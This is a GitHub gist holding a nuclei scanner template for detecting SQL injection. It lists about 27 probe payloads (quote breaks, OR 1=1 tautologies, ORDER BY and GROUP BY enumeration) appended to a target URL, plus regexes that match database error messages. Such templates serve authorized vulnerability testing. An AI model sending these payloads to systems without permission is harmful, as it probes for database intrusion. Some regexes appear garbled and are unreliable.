Skip to content

Instantly share code, notes, and snippets.

@KathanP19
Forked from 0x240x23elu/sqli2.yaml
Created January 2, 2021 02:30
Show Gist options
  • Save KathanP19/0178521942628524a64c5c2cbced5058 to your computer and use it in GitHub Desktop.
Save KathanP19/0178521942628524a64c5c2cbced5058 to your computer and use it in GitHub Desktop.
Basic SQL Injection Detections nuclei Template
id: SQLInjection_ERROR
info:
name: SQLINJECTION Detection
author: 0x240x23elu & OFJAAAH
severity: High
requests:
- method: GET
path:
- "{{BaseURL}}'"
- "{{BaseURL}} 1 or 1"
- "{{BaseURL}} %22%22|0;#"
- "{{BaseURL}} 1 or 1"
- "{{BaseURL}} ''"
- "{{BaseURL}} ' or#"
- "{{BaseURL}} ' OR '1"
- "{{BaseURL}} ' OR 1 -- -"
- "{{BaseURL}} %22 OR 1 = 1 -- -#"
- "{{BaseURL}} %22%22|0;#"
- "{{BaseURL}} OR 1=1"
- "{{BaseURL}} AND 1"
- "{{BaseURL}} AND 0"
- "{{BaseURL}} AND true"
- "{{BaseURL}} AND false"
- "{{BaseURL}} 1-false"
- "{{BaseURL}} 1-true"
- "{{BaseURL}} 1*56"
- "{{BaseURL}} -2"
- "{{BaseURL}} 1' ORDER BY 1--+"
- "{{BaseURL}} 1' ORDER BY 2--+"
- "{{BaseURL}} 1' ORDER BY 3--+"
- "{{BaseURL}} 1' ORDER BY 1,2--+"
- "{{BaseURL}} 1' ORDER BY 1,2,3--+"
- "{{BaseURL}} 1' GROUP BY 1,2,--+"
- "{{BaseURL}} 1' GROUP BY 1,2,3--+"
- "{{BaseURL}} ' GROUP BY columnnames having 1=1 --"
extractors:
- type: regex
part: body
regex:
- "SQL syntax.*MySQL|Warning.*mysql_.*|valid MySQL result|MySqlClient.|mysqli_error|mysqli_query"
- "PostgreSQL.*ERROR|Warning.*Wpg_.*|valid PostgreSQL resultNpgsql."
# - "Driver.* SQL[-_ ]*Server|OLE DB.* SQL Server|(W|A)SQL Server.*Driver|Warning.*mssql_.*|(W|A)SQL Server.*[0-9a-fA-F]{8}|(?s)Exception.*WSystem.Data.SqlClient.|(?s)Exception.*WRoadhouse.Cms.)"
- "Microsoft Access Driver|JET Database Engine|Access Database Engine"
- "ORA-[0-9][0-9][0-9][0-9]|Oracle error|Oracle.*Driver|Warning.*Woci_.*|Warning.*Wora_.*"
- "CLI Driver.*DB2|DB2 SQL error|bdb2_w+"
- "SQLite/JDBCDriver|SQLite.Exception|System.Data.SQLite.SQLiteException|Warning.*sqlite_.*|Warning.*SQLite3::|SQLITE_ERROR"
- "(?i)Warning.*sybase.*|Sybase message|Sybase.*Server message.*"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment